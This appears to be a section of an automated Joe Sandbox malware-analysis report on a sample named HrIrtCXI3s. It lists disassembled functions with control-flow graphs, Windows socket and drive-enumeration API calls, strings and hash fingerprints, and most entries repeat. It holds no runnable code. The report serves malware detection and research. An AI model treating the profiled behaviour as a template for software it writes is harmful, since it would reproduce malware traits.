                                                      • Opcode ID: b5ccc142843c4c527b5aea7b470c3112611e55113aa74febe65d0c63964ce94b
                                                      • Instruction ID: 4ef1b128c7081579fd97d7642047f3cb8c818d1ac539af43200c705e75a3447f
                                                      • Opcode Fuzzy Hash: b5ccc142843c4c527b5aea7b470c3112611e55113aa74febe65d0c63964ce94b
                                                      • Instruction Fuzzy Hash: CC112975A052513BD6205A29AC27F4B3F88EBC2B39F451927F814A33D2E615CD5482E5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1562 858e90-858eb8 _open 1563 858eff-858f2c call 859f70 1562->1563 1564 858eba-858ec7 1562->1564 1574 858f39-858f51 call 858ca8 1563->1574 1565 858ef3-858efa call 858d20 1564->1565 1566 858ec9 1564->1566 1565->1563 1568 858ee2-858ef1 1566->1568 1569 858ecb-858ecd 1566->1569 1568->1565 1568->1566 1572 961670-961687 1569->1572 1573 858ed3-858ed6 1569->1573 1575 96168a-9616b1 1572->1575 1576 961689 1572->1576 1573->1568 1577 858ed8 1573->1577 1581 858f30-858f37 1574->1581 1582 858f53-858f5e call 858cc0 1574->1582 1580 9616b9-9616bf 1575->1580 1577->1568 1583 9616c1-9616cf 1580->1583 1584 9616d9-9616fb 1580->1584 1581->1574 1581->1582 1582->1564 1587 9616d5-9616d8 1583->1587 1589 961706-96171b 1584->1589 1590 9616fd-961704 1584->1590 1589->1583 1590->1589 1591 96171d-961732 1590->1591 1591->1587
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: _open
                                                      • String ID: terminated$@
                                                      • API String ID: 4183159743-3016906910
                                                      • Opcode ID: 957b5f02cb2be1aa99d87e8b3836188dfac9dc5e6ee9f88dadf5779a596182ad
                                                      • Instruction ID: 75c3b9e417b65e0da7240232b75cc58e5ca65df49b50a6f636eccbf081283028
                                                      • Opcode Fuzzy Hash: 957b5f02cb2be1aa99d87e8b3836188dfac9dc5e6ee9f88dadf5779a596182ad
                                                      • Instruction Fuzzy Hash: 824149B0904305DFDB10EF79C44566EBBF4FB48318F048A2EE894D7290EB74D9098B56

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1594 50a150-50a159 1595 50a250 1594->1595 1596 50a15f-50a17b 1594->1596 1597 50a181-50a1ce getsockname 1596->1597 1598 50a249-50a24f 1596->1598 1599 50a1d0-50a1f5 call 4ed090 1597->1599 1600 50a1f7-50a214 call 50ef30 1597->1600 1598->1595 1608 50a240-50a246 call 514f40 1599->1608 1600->1598 1604 50a216-50a23b call 4ed090 1600->1604 1604->1608 1608->1598
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0050A1C7
                                                      Strings
                                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0050A23B
                                                      • getsockname() failed with errno %d: %s, xrefs: 0050A1F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3358416759-2605427207
                                                      • Opcode ID: db6b56a1d60774bcd44b3cc1720bc8601b93d333f3c2e7ad866b5e978b2e471b
                                                      • Instruction ID: 3f91f266390627aac9a555c58bc1b2fc4f212df512bd40ef02bcb9493af6b395
                                                      • Opcode Fuzzy Hash: db6b56a1d60774bcd44b3cc1720bc8601b93d333f3c2e7ad866b5e978b2e471b
                                                      • Instruction Fuzzy Hash: CA21FB71808381B6F6219729DC46FE777ACFF81328F040615FE9853191FE32598587E2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1614 4ed5e0-4ed5ee 1615 4ed652-4ed662 WSAStartup 1614->1615 1616 4ed5f0-4ed604 call 4ed690 1614->1616 1617 4ed664-4ed66f 1615->1617 1618 4ed670-4ed676 1615->1618 1622 4ed61b-4ed651 call 4f7620 1616->1622 1623 4ed606-4ed614 1616->1623 1618->1616 1620 4ed67c-4ed68d 1618->1620 1623->1622 1628 4ed616 1623->1628 1628->1622
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202), ref: 004ED65B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: if_nametoindex$iphlpapi.dll
                                                      • API String ID: 724789610-3097795196
                                                      • Opcode ID: 9364fc30d0353cbec305c39efc9d86a6e16f1e4adb1acbeb0c1d568139726566
                                                      • Instruction ID: 5beef27f288e80f7231d38bbaf1fb62d29a606b7ad2d1eababdc322080939a8f
                                                      • Opcode Fuzzy Hash: 9364fc30d0353cbec305c39efc9d86a6e16f1e4adb1acbeb0c1d568139726566
                                                      • Instruction Fuzzy Hash: 1F012BD0D4438157FB216B39AD1732725D07B56309F440969EC88922D2FB7DC6C8C297
                                                      APIs
                                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0059AB9A
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0059ABE3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsocket
                                                      • String ID:
                                                      • API String ID: 416004797-0
                                                      • Opcode ID: 0152fa0dcebf13ac002b1128240b6d342017e64f6ce963318d8b52054ab294af
                                                      • Instruction ID: 29b42dec163e7982673326a04db7d9a802aca12d7c88c6b7f0ea40a2e45c010c
                                                      • Opcode Fuzzy Hash: 0152fa0dcebf13ac002b1128240b6d342017e64f6ce963318d8b52054ab294af
                                                      • Instruction Fuzzy Hash: 7BE19E706043019BEB20CF24C885B6ABBE5FF85314F144A2DF9999B291E775DD44CBA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 47412d6204327917a500152264c261968b4170afccb8f4e1cc73dcec426fb2cf
                                                      • Instruction ID: a1c1628c99bddb1fd2843c8a07c8ed0fc8723729832026d629997d6a614f8590
                                                      • Opcode Fuzzy Hash: 47412d6204327917a500152264c261968b4170afccb8f4e1cc73dcec426fb2cf
                                                      • Instruction Fuzzy Hash: 8271D3EB17C121BE726291952B54AFB6BEDF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 768de728fe7fda26f06e6f819da8ee8b59b28b43ed8245baf3e2cd6895d784fb
                                                      • Instruction ID: 2d523a410cd398e1c54c060561aaa45e91ee6b638d5b788fb5d6cbc335391678
                                                      • Opcode Fuzzy Hash: 768de728fe7fda26f06e6f819da8ee8b59b28b43ed8245baf3e2cd6895d784fb
                                                      • Instruction Fuzzy Hash: 6471C0EB17C125BE716291852B54AFB6BEEF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: a8b5aa4e4c98d6dec9a414666ecefe73b82c1906d8aa6b262bca62e7f688fdbb
                                                      • Instruction ID: da91b10a98cb6e9a63beb29ed29433c43cb3f363960d7e734ca053fa10c8a021
                                                      • Opcode Fuzzy Hash: a8b5aa4e4c98d6dec9a414666ecefe73b82c1906d8aa6b262bca62e7f688fdbb
                                                      • Instruction Fuzzy Hash: 9C7103EB17C160BEB26291452B54AFB6BEDF5F7730B308466F807DA602E2D80EC95171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 1043948ad6a661933188be8ad684f7e1ad6bc7866dee90b7ea503768bbf46f17
                                                      • Instruction ID: 214b3de7819ecab896c55c496d7d5b8f73583a4d0004867063c1c7fa5cf89c0b
                                                      • Opcode Fuzzy Hash: 1043948ad6a661933188be8ad684f7e1ad6bc7866dee90b7ea503768bbf46f17
                                                      • Instruction Fuzzy Hash: 2261C3EB17C125BE716291852B54AFB6BEEF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: c8576d14528a8848407c93702b0f0ce3f06964016dfc63f2da6749e986bd3c61
                                                      • Instruction ID: 26a7f1b6cd91cc02eef936d0344a6cc6c160e1e43fafcbd2f306baa221924ab7
                                                      • Opcode Fuzzy Hash: c8576d14528a8848407c93702b0f0ce3f06964016dfc63f2da6749e986bd3c61
                                                      • Instruction Fuzzy Hash: E561E5EB17C160BEB26281452B54AFB6BADF5F7730B318467F407DA602E2D80BCA5131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 9c4837c53e050b2d912e6a5e83731f92718d9df1583e4bb4c24fa97a305a3069
                                                      • Instruction ID: 7f3b541353ec12a1f30e01da5662d4ff459f2a1d5bbf3445a00fc3b7b231c2e4
                                                      • Opcode Fuzzy Hash: 9c4837c53e050b2d912e6a5e83731f92718d9df1583e4bb4c24fa97a305a3069
                                                      • Instruction Fuzzy Hash: 736170EB17C125BE716291452B64AFB6BADF5F7730B308466F807D6602E2D80ECA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: dcf31292baafa3991c216353114bc852737e6cb301d93315117b3dc44152b5af
                                                      • Instruction ID: c6ecb1b5a4f29b70ab89126780a3a810dbf41cad5531539f385cc6c7f70fa0a4
                                                      • Opcode Fuzzy Hash: dcf31292baafa3991c216353114bc852737e6cb301d93315117b3dc44152b5af
                                                      • Instruction Fuzzy Hash: A2519FEB17C161BE716281452B54AFB6BAEF5F7730B308466F807D6602E2D80FCA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 0db1fd806ca9a7e95d317b9f621e2942ee4476c3477c8bbf07dda6e0a00014cb
                                                      • Instruction ID: f7c63e51c9968f738f2ae7fb161a30128caf04178086fd62dbea9f53a5847c41
                                                      • Opcode Fuzzy Hash: 0db1fd806ca9a7e95d317b9f621e2942ee4476c3477c8bbf07dda6e0a00014cb
                                                      • Instruction Fuzzy Hash: 8B5170EB17C125BE716291462B54AFB5BADF5F7730B308467F807DA602E2D80BCA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 0acb1aa86a5628d4d8dde34170dfe7d058643d9607533d0b973b49ab6542968f
                                                      • Instruction ID: 744a17a6494dff67ee69193105f71e0da4edf4d9bb383871eb5bcb05339b32c5
                                                      • Opcode Fuzzy Hash: 0acb1aa86a5628d4d8dde34170dfe7d058643d9607533d0b973b49ab6542968f
                                                      • Instruction Fuzzy Hash: D851A1EB17C125BE716291852B64AFB5BADF5F7730B308466F807DA602E2D80FC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 31155e3abd3fe12bbaa0077c112e6f4737a7a9fe05c673a3083500f98d83d8ea
                                                      • Instruction ID: 7783d1b86c61a6b586f7b321b8d7d05abe89ee6787b28d93b54e3926384e7e7b
                                                      • Opcode Fuzzy Hash: 31155e3abd3fe12bbaa0077c112e6f4737a7a9fe05c673a3083500f98d83d8ea
                                                      • Instruction Fuzzy Hash: 1E5191EB17C165BE716291852B54AFB6BAEF5F7730B308466F407DA602E2D80FC91131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: dcc656f76bc5d9ae38b8ddf0d2d600dfdb928ea3566feb53b3631927310ce518
                                                      • Instruction ID: 6826f68365f4034bf2857f0e9373883bf531675c3105a6c51fa0631ff3500172
                                                      • Opcode Fuzzy Hash: dcc656f76bc5d9ae38b8ddf0d2d600dfdb928ea3566feb53b3631927310ce518
                                                      • Instruction Fuzzy Hash: 305191EB17C161BE716291852B54AFB6BAEF5F7730B308466F807D5602E2D80BCA1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 8d21c59fad0586a132b521265289f6a845606f030f94315e829764dcb871b7d2
                                                      • Instruction ID: f63f71b45e15d1ed6eed8f2e62346a2198a1ee89d511dbade9cb05ee1af0f87f
                                                      • Opcode Fuzzy Hash: 8d21c59fad0586a132b521265289f6a845606f030f94315e829764dcb871b7d2
                                                      • Instruction Fuzzy Hash: 0251A2EB17C121BE716291852B54AFB6BAEF5F7730B308466F407DA602E2D40BC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2d8b2b3e54a558697699c99477e4eb1f23a8966a3c18cd5644fef84e0ac752fc
                                                      • Instruction ID: bd77770159f9543735dfc666f9b316a3ead61df46b0bca0b9e8f9af5cff678f0
                                                      • Opcode Fuzzy Hash: 2d8b2b3e54a558697699c99477e4eb1f23a8966a3c18cd5644fef84e0ac752fc
                                                      • Instruction Fuzzy Hash: E351C1EB17C125BE626291852B94AFA6BAEF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2a7a5e0acb0a17c4042c1891830721695ecb62d90427f7f891e37cbc08fcc19a
                                                      • Instruction ID: 94ce76035b2046d6c1c8bb4b510112fad3569ce4b10263da30e929b62c2335e4
                                                      • Opcode Fuzzy Hash: 2a7a5e0acb0a17c4042c1891830721695ecb62d90427f7f891e37cbc08fcc19a
                                                      • Instruction Fuzzy Hash: 1551B1EB57C125BE626291852B94AFB6BEEF5F7730B308466F407D6602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 7e0c0226fd5e250c926e7568cb6f1b8b1455630517823c1672427a42f3bae1b4
                                                      • Instruction ID: 264c713c220385602ba65e1f0f6259591087aa61eaa9bbcace7cad287e3d38b0
                                                      • Opcode Fuzzy Hash: 7e0c0226fd5e250c926e7568cb6f1b8b1455630517823c1672427a42f3bae1b4
                                                      • Instruction Fuzzy Hash: 2D41B2EB57C125BE626291852B54AFB6BAEF5F7730B308466F407D6602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: a7e6a82dbf56353e4120f528de9019eb6c3aa3629fdc6d0205659d024418d46a
                                                      • Instruction ID: e7b696004ceb71a63e564243898343a9f5c5d3755f579c21c719d403d0c49aad
                                                      • Opcode Fuzzy Hash: a7e6a82dbf56353e4120f528de9019eb6c3aa3629fdc6d0205659d024418d46a
                                                      • Instruction Fuzzy Hash: 3941D3EB17C125BE726295852B54AFB6BADF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4ebb7530ac988def6bd30f16edb6e33ab27de424bd85e4578ff505e1c4252cbd
                                                      • Instruction ID: be31661256f5d290bcd29dcf7722db6fc24284b7698b1648b2e2e953a83a7543
                                                      • Opcode Fuzzy Hash: 4ebb7530ac988def6bd30f16edb6e33ab27de424bd85e4578ff505e1c4252cbd
                                                      • Instruction Fuzzy Hash: C441A0EB57C125BE626291852B94AFB6BAEF5F7730B308466F407D9602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: f2184d1201735d1971a39f2724a0cde16b74a193a051ae29bb64455c4fb9b463
                                                      • Instruction ID: 02d46e05cc68a52b53b2735a3619fac56f4e8b06b0d3f4b28dd448fd93fa1109
                                                      • Opcode Fuzzy Hash: f2184d1201735d1971a39f2724a0cde16b74a193a051ae29bb64455c4fb9b463
                                                      • Instruction Fuzzy Hash: E341D3EB57C124BE716291852B95AFB6BADF5F7730B308466F407D5602E2E40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4c5c12f8ab65ee4e7a33676e12f14b1707aeca940844611ab045bb3a8ecf654f
                                                      • Instruction ID: df39cd644b0c1fa4548836ea0100850db0a80e18f86492c020e282e1ed413aa1
                                                      • Opcode Fuzzy Hash: 4c5c12f8ab65ee4e7a33676e12f14b1707aeca940844611ab045bb3a8ecf654f
                                                      • Instruction Fuzzy Hash: E141D0EB57C124BE726291852B94AFB6BAEF5F7730B308466F407D5A02E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
